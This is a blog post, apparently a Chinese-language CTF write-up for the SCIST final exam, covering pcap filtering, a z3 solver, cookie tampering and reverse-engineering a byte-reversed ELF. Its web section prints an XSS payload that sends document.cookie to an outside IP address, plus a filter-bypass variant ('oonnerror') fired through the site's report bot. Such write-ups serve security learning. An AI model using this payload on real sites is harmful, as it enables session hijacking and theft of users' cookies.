<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>SCIST Final Exam | HackThe4O4</title>

  <!-- keywords -->
  

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="平台 wELCOMEF12開起來，FLAG藏裡面 MiscIntruder 1&#x2F;3這題的wireshark檔案在過濾後好像是這些奇怪的來源?因為Huge Ports 大埠通訊的來源通常都怪怪的dns or ((tcp.srcport &gt;&#x3D;1024 and tcp.dstport &gt;&#x3D;1024) and (tcp.flags.syn&#x3D;&#x3D;1 or tcp.flags.fin&#x3D;&#x3D;1">
<meta property="og:type" content="article">
<meta property="og:title" content="SCIST Final Exam">
<meta property="og:url" content="https://no-flag.com/2024/12/21/SCIST_final/index.html">
<meta property="og:site_name" content="HackThe4O4">
<meta property="og:description" content="平台 wELCOMEF12開起來，FLAG藏裡面 MiscIntruder 1&#x2F;3這題的wireshark檔案在過濾後好像是這些奇怪的來源?因為Huge Ports 大埠通訊的來源通常都怪怪的dns or ((tcp.srcport &gt;&#x3D;1024 and tcp.dstport &gt;&#x3D;1024) and (tcp.flags.syn&#x3D;&#x3D;1 or tcp.flags.fin&#x3D;&#x3D;1">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://i.imgur.com/gpHhMXK.png">
<meta property="og:image" content="https://i.imgur.com/EuX2hiT.png">
<meta property="og:image" content="https://i.imgur.com/wnhJ6eW.png">
<meta property="og:image" content="https://i.imgur.com/oj94ZLN.png">
<meta property="og:image" content="https://i.imgur.com/Q84Ifpy.png">
<meta property="og:image" content="https://i.imgur.com/ffN3pV1.png">
<meta property="og:image" content="https://i.imgur.com/YW8iekl.png">
<meta property="og:image" content="https://i.imgur.com/6JsxjQE.png">
<meta property="og:image" content="https://i.imgur.com/xP5zszv.png">
<meta property="og:image" content="https://i.imgur.com/MvAQZmt.png">
<meta property="og:image" content="https://i.imgur.com/QCaGOUG.png">
<meta property="og:image" content="https://i.imgur.com/YQEVzxJ.png">
<meta property="og:image" content="https://i.imgur.com/bSEwyxf.png">
<meta property="og:image" content="https://i.imgur.com/yb4S9SP.png">
<meta property="og:image" content="https://i.imgur.com/y9HzSmG.png">
<meta property="og:image" content="https://i.imgur.com/6gi229J.png">
<meta property="og:image" content="https://i.imgur.com/GGGNbax.png">
<meta property="article:published_time" content="2024-12-21T12:32:07.094Z">
<meta property="article:modified_time" content="2024-04-03T17:44:42.362Z">
<meta property="article:author" content="Noflag">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.imgur.com/gpHhMXK.png">
  
    <link rel="alternative" href="/atom.xml" title="HackThe4O4" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/cat.jpg">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  

  
<script src="//cdn.bootcss.com/require.js/2.3.2/require.min.js"></script>

  
<script src="//cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script>


  


<meta name="generator" content="Hexo 7.3.0"></head>
<body>
  <div id="container">
    <div id="particles-js"></div>
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
	<header id="header" class="inner">
		<a href="/" class="profilepic">
			
			<img lazy-src="/img/mela.gif" class="js-avatar">
			
		</a>

		<hgroup>
		  <h1 class="header-author"><a href="/"></a></h1>
		</hgroup>

		

		

		<div class="switch-area">
			<div class="switch-wrap">
				<section class="switch-part switch-part1">
					<nav class="header-menu">
						<ul>
						
							<li><a href="/2024/12/21/hello-world/">About Me</a></li>
				        
							<li><a href="/archives">All articles</a></li>
				        
						</ul>
					</nav>
					<nav class="header-nav">
						<div class="social">
							
						</div>
					</nav>
				</section>
				
				
				
				

				
			</div>
		</div>
	</header>				
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
  	<div class="overlay">
  		<div class="slider-trigger"></div>
  		<h1 class="header-author js-mobile-header hide"></h1>
  	</div>
	<div class="intrude-less">
		<header id="header" class="inner">
			<div class="profilepic">
				<img lazy-src="/img/mela.gif" class="js-avatar">
			</div>
			<hgroup>
			  <h1 class="header-author"></h1>
			</hgroup>
			
			<nav class="header-menu">
				<ul>
				
					<li><a href="/2024/12/21/hello-world/">About Me</a></li>
		        
					<li><a href="/archives">All articles</a></li>
		        
		        <div class="clearfix"></div>
				</ul>
			</nav>
			<nav class="header-nav">
				<div class="social">
					
				</div>
			</nav>
		</header>				
	</div>
</nav>
      <div class="body-wrap"><article id="post-SCIST_final" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2024/12/21/SCIST_final/" class="article-date">
  	<time datetime="2024-12-21T12:32:07.094Z" itemprop="datePublished">2024-12-21</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      SCIST Final Exam
      
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
        

        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
        <p><a target="_blank" rel="noopener" href="https://ctf.scist.org/challenges">平台</a><br><img src="https://i.imgur.com/gpHhMXK.png"></p>
<h2 id="wELCOME"><a href="#wELCOME" class="headerlink" title="wELCOME"></a>wELCOME</h2><p>F12開起來，FLAG藏裡面<br><img src="https://i.imgur.com/EuX2hiT.png"></p>
<h2 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h2><h3 id="Intruder-1-3"><a href="#Intruder-1-3" class="headerlink" title="Intruder 1&#x2F;3"></a>Intruder 1&#x2F;3</h3><p><img src="https://i.imgur.com/wnhJ6eW.png"><br>這題的wireshark檔案在過濾後好像是這些奇怪的來源?因為Huge Ports 大埠通訊的來源通常都怪怪的<br><code>dns or ((tcp.srcport &gt;=1024 and tcp.dstport &gt;=1024) and (tcp.flags.syn==1 or tcp.flags.fin==1 or tcp.flags.reset==1))</code><br><img src="https://i.imgur.com/oj94ZLN.png"><br>後來打算先看看decryption key裡面有沒有其他線索，用IDA反解過去，flag就出來嘞<br><img src="https://i.imgur.com/Q84Ifpy.png"></p>
<h3 id="FruteForce"><a href="#FruteForce" class="headerlink" title="FruteForce?"></a>FruteForce?</h3><p><img src="https://i.imgur.com/ffN3pV1.png"></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> z3 <span class="keyword">import</span> Real, BitVecRef, BitVecVal, Int, Extract, Solver, SolverFor, Concat, Or, And, If, sat, simplify, LShR, Sum, URem, UDiv, set_option, Tactic</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    x = [Int(<span class="string">&#x27;apple&#x27;</span>), Int(<span class="string">&#x27;orange&#x27;</span>), Int(<span class="string">&#x27;lemon&#x27;</span>)]</span><br><span class="line">    s = Solver()</span><br><span class="line">    s.add(x[<span class="number">0</span>]*x[<span class="number">0</span>]+x[<span class="number">1</span>]*x[<span class="number">1</span>] == <span class="number">256325</span>)</span><br><span class="line">    s.add(x[<span class="number">0</span>]*x[<span class="number">2</span>] == x[<span class="number">1</span>]*<span class="number">13910</span>+<span class="number">441</span>)</span><br><span class="line">    <span class="keyword">while</span> (t := s.check()) == sat:</span><br><span class="line">        m = s.model()</span><br><span class="line">        <span class="built_in">print</span>(m)</span><br><span class="line">        apple, orange, lemon = [m[x[i]].as_long() <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(x))]</span><br><span class="line">        <span class="built_in">print</span>(<span class="number">3</span>**apple == (orange**<span class="number">3</span>+lemon))</span><br><span class="line">        <span class="built_in">print</span>(<span class="built_in">pow</span>(orange, apple, lemon))</span><br><span class="line">        s.add(Or([x[i] != m[x[i]].as_long() <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(x))]))</span><br><span class="line">    <span class="built_in">print</span>(t)</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>這題其實很玄，因為一開始用z3正常的方式解三元方程式可是一直解不出答案，後來換個方式去算<br><img src="https://i.imgur.com/YW8iekl.png"></p>
<h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><h3 id="Are-you-admin"><a href="#Are-you-admin" class="headerlink" title="Are you admin?"></a>Are you admin?</h3><p>登入後發現有一個 &#x2F;flag1 的頁面，不過 get 該頁面時會回傳 <code>&#123;&quot;done&quot;:false,&quot;msg&quot;:&quot;Not admin :(&quot;&#125;</code>, 發現 cookie 中有一個 is_admin，當 is_admin 為 true 時，便能成功讀取 &#x2F;flag 頁面中的 flag。<br><img src="https://i.imgur.com/6JsxjQE.png"><br><img src="https://i.imgur.com/xP5zszv.png"></p>
<h3 id="Login-as-ADMIN"><a href="#Login-as-ADMIN" class="headerlink" title="Login as ADMIN ?"></a>Login as ADMIN ?</h3><p>接着發現網站上有兩個頁面 &#x2F;note.html 以及 &#x2F;share, &#x2F;note 中有一個能夠上傳字串到服務器的功能（類似論壇）,或許會有 XSS 的問題。同過 payload: <code>&lt;h1&gt;aaaaaa&lt;/h1&gt;</code> 的測試後發現 XSS 問題確實存在。</p>
<p>接着 &#x2F;report 頁面似乎提供服務器主動訪問目標 url 的功能，首先來驗證服務器是否對外連網，可以使用 <code>python3 -m http.server &lt;your_port&gt;</code> 或是 <code>tcpdump -i &lt;your_interface&gt; port &lt;your port&gt;</code> 進行測試，驗證了服務器有對外連線。<br><img src="https://i.imgur.com/MvAQZmt.png"></p>
<p>看起來 &#x2F;report 頁面會使服務器用 get 方式訪問 url，因此這裡或許可以使用不需要 victim 互動的 reflected XSS。</p>
<p>在 notes 頁面中通過 payload:<code>&lt;img src=x onerror=this.src=&#39;http://27.147.28.70:9945/?&#39;+document.cookie;&gt;</code> 驗證此 payload 的有效性<br><img src="https://i.imgur.com/QCaGOUG.png"></p>
<p>不過在 share 頁面中卻無效了，review 過 &#x2F;share 頁面的原始碼後發現該頁面有客戶端的 filter，該 filter 會將 on 以及 ig 字串刪除。</p>
<figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">(<span class="title function_">async</span> () =&gt; &#123;</span><br><span class="line">    <span class="keyword">const</span> &#123; done, note &#125; = <span class="keyword">await</span> <span class="title function_">fetch</span>(<span class="string">&#x27;/share&#x27;</span>+location.<span class="property">search</span>).<span class="title function_">then</span>(<span class="function"><span class="params">res</span> =&gt;</span> res.<span class="title function_">json</span>())</span><br><span class="line">    <span class="keyword">if</span> (!done) <span class="keyword">return</span> <span class="title function_">alert</span>(msg || <span class="string">&quot;Unknown error&quot;</span>)</span><br><span class="line">    content.<span class="property">innerHTML</span> = (note || <span class="string">&quot;&quot;</span>).<span class="title function_">replaceAll</span>(<span class="string">&#x27;&lt;/pre&gt;&#x27;</span>, <span class="string">&#x27;&#x27;</span>).<span class="title function_">replaceAll</span>(<span class="regexp">/on/ig</span>, <span class="string">&#x27;&#x27;</span>)</span><br><span class="line">&#125;)()</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>而想要繞過也很簡單，我們可以將 onerror 修改為 oonnerror，因此整體 payload 為：<code>&lt;img src=x oonnerror=this.src=&#39;http://27.147.28.70:9945/?&#39;+document.cookie;&gt;</code><br>將含有該 payload 的 &#x2F;share 頁面作為 &#x2F;report 頁面的 url 後，相當於對服務器主機發起 reflect XSS 攻擊，最終能成功取得主機的 cookie。<br><img src="https://i.imgur.com/YQEVzxJ.png"></p>
<h2 id="Reverse"><a href="#Reverse" class="headerlink" title="Reverse"></a>Reverse</h2><h3 id="Vault"><a href="#Vault" class="headerlink" title="Vault"></a>Vault</h3><p>使用 <a target="_blank" rel="noopener" href="https://github.com/rocky/python-uncompyle6/">uncompyle6</a> 將 .pyc 逆向回 .py，<br>可以發現 .py 中驗證機制如何運作，<br>密碼是 20 位數字，具體我忘了，但反正有 flag 就好 科科<br><img src="https://i.imgur.com/bSEwyxf.png"></p>
<h3 id="Reverse-1"><a href="#Reverse-1" class="headerlink" title="Reverse"></a>Reverse</h3><figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">❯ file reverse</span><br><span class="line">reverse: data</span><br><span class="line">❯ xxd reverse</span><br><span class="line">00000000: 0000 0000 0000 0000 0000 0000 0000 0001  ................</span><br><span class="line">&lt;skip&gt;</span><br><span class="line">00004830: 4429 0f20 3a67 6e69 7274 73b8 4800 4824  D). :gnirts.H.H$</span><br><span class="line">00004840: 44c6 3024 7c8d 48c0 3100 0000 d824 8489  D.0$|.H.1....$..</span><br><span class="line">&lt;skip&gt;</span><br><span class="line">000053a0: 0000 0000 0000 656c 6261 5465 6e6f 6c43  ......elbaTenolC</span><br><span class="line">000053b0: 4d54 7265 7473 6967 6572 5f4d 5449 5f00  MTretsiger_MTI_.</span><br><span class="line">000053c0: 5f5f 7472 6174 735f 6e6f 6d67 5f5f 0065  __trats_nomg__.e</span><br><span class="line">000053d0: 6c62 6154 656e 6f6c 434d 5472 6574 7369  lbaTenolCMTretsi</span><br><span class="line">000053e0: 6765 7265 645f 4d54 495f 0035 2e32 2e32  gered_MTI_.5.2.2</span><br><span class="line">000053f0: 5f43 4249 4c47 0034 2e32 5f43 4249 4c47  _CBILG.4.2_CBILG</span><br><span class="line">00005400: 0034 2e33 2e32 5f43 4249 4c47 0037 2e32  .4.3.2_CBILG.7.2</span><br><span class="line">00005410: 5f43 4249 4c47 006e 6961 6d5f 7472 6174  _CBILG.niam_trat</span><br><span class="line">00005420: 735f 6362 696c 5f5f 0070 6d63 7274 7300  s_cbil__.pmcrts.</span><br><span class="line">00005430: 6b68 635f 6674 6e69 7270 735f 5f00 657a  khc_ftnirps__.ez</span><br><span class="line">00005440: 696c 616e 6966 5f61 7863 5f5f 006e 656c  ilanif_axc__.nel</span><br><span class="line">00005450: 7274 7300 6c69 6166 5f6b 6863 5f6b 6361  rts.liaf_khc_kca</span><br><span class="line">00005460: 7473 5f5f 0073 7475 7000 666e 6163 735f  ts__.stup.fnacs_</span><br><span class="line">00005470: 3939 636f 7369 5f5f 0062 6f72 666d 656d  99cosi__.borfmem</span><br><span class="line">00005480: 006b 6863 5f66 746e 6972 705f 5f00 362e  .khc_ftnirp__.6.</span><br><span class="line">00005490: 6f73 2e63 6269 6c00 0000 0000 0000 0000  os.cbil.........</span><br><span class="line">&lt;skip&gt;</span><br><span class="line">00005920: 0000 0000 0000 0318 0000 0000 0000 0318  ................</span><br><span class="line">00005930: 0000 0004 0000 0003 0000 0000 0000 0008  ................</span><br><span class="line">00005940: 0000 0000 0000 02d8 0000 0000 0000 02d8  ................</span><br><span class="line">00005950: 0000 0000 0000 0040 0000 0000 0000 0040  .......@.......@</span><br><span class="line">00005960: 0000 0000 0000 0040 0000 0004 0000 0006  .......@........</span><br><span class="line">00005970: 0025 0026 0040 000d 0038 0040 0000 0000  .%.&amp;.@...8.@....</span><br><span class="line">00005980: 0000 0000 0000 5030 0000 0000 0000 0040  ......P0.......@</span><br><span class="line">00005990: 0000 0000 0000 12a0 0000 0001 003e 0003  .............&gt;..</span><br><span class="line">000059a0: 0000 0000 0000 0000 0001 0102 464c 457f  ............FLE.</span><br></pre></td></tr></table></figure>

<p>看到最後的 FLE. 以及中間的字串基本能確定這是一個經過了翻轉的 ELF 檔案。 </p>
<p>查到<a target="_blank" rel="noopener" href="https://unix.stackexchange.com/questions/416401/how-to-reverse-the-content-of-binary-file">本網站</a>，把整個檔案倒過來：<code>&lt; reverse xxd -p -c1 | tac | xxd -p -r &gt; reverse_out</code></p>
<p>使用 ghidra 的反編譯進行逆向後可見：<br><img src="https://i.imgur.com/yb4S9SP.png"></p>
<p>單純反組譯：<br><img src="https://i.imgur.com/y9HzSmG.png"></p>
<p>使用動態分析方式在 <code>call memfrob</code> 後下斷點，然後直接觀察 magic 變數的值。<br><img src="https://i.imgur.com/6gi229J.png"><br>var_8h（也就是 magic）的 hex 值轉換為 ASCII 為 “esrever”</p>
<p><img src="https://i.imgur.com/GGGNbax.png"></p>

      
    </div>
    
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2024/12/21/TQC/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">&lt;</strong>
      <div class="article-nav-title">
        
          Exam Python
        
      </div>
    </a>
  
  
    <a href="/2024/12/21/Scanning%20&%20Enumeration/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">Scanning &amp; Enumeration</div>
      <strong class="article-nav-caption">&gt;</strong>
    </a>
  
</nav>

  
</article>





</div>
      <footer id="footer">
  <div class="outer">
    <div id="footer-info">
      <div class="footer-left">
        &copy; 2024 Noflag
      </div>
        <div class="footer-right">
          <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/smackgg/hexo-theme-smackdown" target="_blank">Smackdown</a>
        </div>
    </div>
  </div>
</footer>
    </div>
    
  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">



<script>
	var yiliaConfig = {
		fancybox: true,
		mathjax: true,
		animate: true,
		isHome: false,
		isPost: true,
		isArchive: false,
		isTag: false,
		isCategory: false,
		open_in_new: false
	}
</script>

<script src="/js/main.js"></script>




<script type="text/x-mathjax-config">
MathJax.Hub.Config({
    tex2jax: {
        inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
        processEscapes: true,
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    }
});

MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';                 
    }       
});
</script>

<script src="//cdn.bootcss.com/mathjax/2.7.0/MathJax.js"></script>


  </div>
</body>
</html>